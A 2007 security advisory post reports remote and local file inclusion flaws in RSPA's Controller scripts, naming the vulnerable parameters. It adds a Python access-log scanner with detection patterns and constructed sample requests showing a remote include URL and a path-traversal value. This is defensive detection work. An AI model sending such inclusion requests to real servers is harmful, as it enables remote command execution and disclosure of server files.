Multiple vulnerabilities reported in Really Simple PHP and Ajax
Filed in archive AJAX by gautam on April 05, 2007

Multiple vulnerabilities have been reported in Really Simple PHP and Ajax (RSPA) which hackers could exploit to execute arbitrary commands. This is a high-risk vulnerability that can be exploited remotely. The first security issue is due to input validation errors in the framework/Controller_v5.php and framework/Controller_v4.php scripts when processing the _IncludeFilePHPClass and _ClassPath parameters, which remote attackers could exploit to include malicious scripts and execute arbitrary commands. The second is caused by input validation errors in the framework/Controller_v5.php and framework/Controller_v4.php scripts when processing the __class parameter, which remote attackers could exploit to include or disclose the contents of local files with the privileges of the web server.
RSPA 2007-03-23 and earlier versions are affected by the vulnerability. No details are available as of now regarding any official patch for plugging the hole.
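
Until a fix is available, access logs can be checked for requests that pass file-like values in the affected parameters. The following is an added example, not code from RSPA or from the original report; it assumes the Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names come from the advisory text above.
SCRIPTS = ("framework/Controller_v5.php", "framework/Controller_v4.php")
PARAMS = {"_IncludeFilePHPClass", "_ClassPath", "__class"}
# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def classify(value):
    """Return why a parameter value looks like a file-inclusion attempt, or None."""
    if re.match(r"(?i)^[a-z][a-z0-9+.-]*://", value):
        return "url-scheme"
    if "\x00" in value:
        return "null-byte"
    if ".." in value.replace("\\", "/").split("/"):
        return "path-traversal"
    if value.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:[\\/]", value):
        return "absolute-path"
    return None

def scan(lines):
    """Yield (client, script, parameter, reason) for each suspicious request."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        url = urlsplit(target)
        script = next((s for s in SCRIPTS if url.path.endswith("/" + s)), None)
        if script is None:
            continue
        # parse_qsl percent-decodes each name and value once before we inspect it.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify(value) if name in PARAMS else None
            if reason:
                yield client, script, name, reason

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Apr/2007:10:00:01 +0000] "GET /rspa/framework/Controller_v5.php?_ClassPath=http%3A%2F%2Fhost.example%2Finc%2F HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [05/Apr/2007:10:00:04 +0000] "GET /rspa/framework/Controller_v4.php?__class=..%2F..%2Fconf%2Fsite.ini HTTP/1.1" 200 1840 "-" "-"',
    '198.51.100.20 - - [05/Apr/2007:10:01:10 +0000] "GET /rspa/framework/Controller_v5.php?__class=Customer HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.20 - - [05/Apr/2007:10:01:12 +0000] "GET /index.php?_ClassPath=http%3A%2F%2Fhost.example%2F HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Access logs record only the query string, so the same parameters sent in a POST body will not appear here and need request-body logging or a WAF rule to catch.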












